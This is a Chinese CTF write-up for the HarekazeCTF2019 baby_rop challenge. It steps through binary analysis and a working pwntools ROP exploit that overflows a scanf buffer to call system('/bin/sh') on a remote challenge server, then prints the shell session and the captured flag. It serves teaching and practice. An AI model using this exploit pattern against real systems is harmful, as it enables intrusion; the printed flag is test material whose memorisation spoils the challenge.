【pwn做题记录】02.[HarekazeCTF2019]baby_rop 1
例题:[HarekazeCTF2019]baby_rop 1
首先检查一下文件:
C:\Users\A\Downloads>checksec babyrop
[*] 'C:\\Users\\A\\Downloads\\babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
上面每一条的意思是:
- 64位程序,小端序
- GOT表部分可读可写
- 没有栈保护
- 栈不可执行
- 地址固定
- 保留了字符表和调试信息
根据没有栈保护,地址固定,栈不可执行,可能考查简单的栈溢出或ROP
用IDA打开文件,查看main函数:
int __fastcall main(int argc, const char **argv, const char **envp)
{
char v4[16]; // [rsp+0h] [rbp-10h] BYREF
system("echo -n \"What's your name? \"");
__isoc99_scanf("%s", v4);
printf("Welcome to the Pwn World, %s!\n", v4);
return 0;
}
显然这里有栈溢出的注入点:__isoc99_scanf("%s", v4);,顺便双击v4看一下栈:
-0000000000000010 var_10 db ?
-000000000000000F db ? ; undefined
-000000000000000E db ? ; undefined
-000000000000000D db ? ; undefined
-000000000000000C db ? ; undefined
-000000000000000B db ? ; undefined
-000000000000000A db ? ; undefined
-0000000000000009 db ? ; undefined
-0000000000000008 db ? ; undefined
-0000000000000007 db ? ; undefined
-0000000000000006 db ? ; undefined
-0000000000000005 db ? ; undefined
-0000000000000004 db ? ; undefined
-0000000000000003 db ? ; undefined
-0000000000000002 db ? ; undefined
-0000000000000001 db ? ; undefined
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables
当垃圾数据为 0x10 + 8 个字节的时候,就可以栈溢出
前面调用了system,所以可以用system@plt来调用system。
在IDA里按住shift+F12,可以看到/bin/sh字符串
LOAD:0000000000400238 0000001C C /lib64/ld-linux-x86-64.so.2
LOAD:0000000000400349 0000000A C libc.so.6
LOAD:0000000000400353 0000000F C __isoc99_scanf
LOAD:0000000000400362 00000007 C printf
LOAD:0000000000400369 00000007 C system
LOAD:0000000000400370 00000012 C __libc_start_main
LOAD:0000000000400382 0000000F C __gmon_start__
LOAD:0000000000400391 0000000A C GLIBC_2.7
LOAD:000000000040039B 0000000C C GLIBC_2.2.5
.rodata:00000000004006A8 0000001D C echo -n \"What's your name? \"
.rodata:00000000004006C8 0000001F C Welcome to the Pwn World, %s!\n
.eh_frame:0000000000400787 00000006 C ;*3$\"
.data:0000000000601048 00000008 C /bin/sh
由于这是一个64位程序,所以为了给system传参,所以还需要一个pop_rdi_ret,这里用ROPgadget工具查询一下
┌──(kali㉿kali)-[~/桌面/attack]
└─$ ROPgadget --binary "./babyrop" --only "pop|ret" | grep rdi
0x0000000000400683 : pop rdi ; ret
思路总结:
这题可以利用system@plt调用system,还有/bin/sh,还有pop_rdi_ret,所以可以利用ROP来实现栈溢出。
攻击脚本:
#!/bin/python
from pwn import *
elf = ELF("./babyrop")
system_plt = elf.plt["system"]
bin_sh = next(elf.search(b"/bin/sh"))
pop_rdi_ret = 0x400683
payload = b"a" * (0x10 + 8) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_plt)
io = remote("node5.buuoj.cn",27498)
io.recv()
io.sendline(payload)
io.interactive()
由于ls后没有flag,所以用find -name flag查找flag文件
[+] Opening connection to node5.buuoj.cn on port 27498: Done
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ find -name flag
find: './root': Permission denied
./home/babyrop/flag
find: './proc/tty/driver': Permission denied
find: './proc/1/task/1/fd': Permission denied
find: './proc/1/task/1/fdinfo': Permission denied
find: './proc/1/task/1/ns': Permission denied
find: './proc/1/fd': Permission denied
find: './proc/1/map_files': Permission denied
find: './proc/1/fdinfo': Permission denied
find: './proc/1/ns': Permission denied
find: './proc/7/task/7/fd': Permission denied
find: './proc/7/task/7/fdinfo': Permission denied
find: './proc/7/task/7/ns': Permission denied
find: './proc/7/fd': Permission denied
find: './proc/7/map_files': Permission denied
find: './proc/7/fdinfo': Permission denied
find: './proc/7/ns': Permission denied
find: './var/cache/ldconfig': Permission denied
find: './var/cache/apt/archives/partial': Permission denied
find: './var/lib/apt/lists/partial': Permission denied
find: './var/spool/rsyslog': Permission denied
find: './var/spool/cron/crontabs': Permission denied
$ cat ./home/babyrop/flag
flag{d3ccdf65-5baf-4d71-b2ff-1ad65e5c8b71}
$
[*] Closed connection to node5.buuoj.cn port 27498
浙公网安备 33010602011771号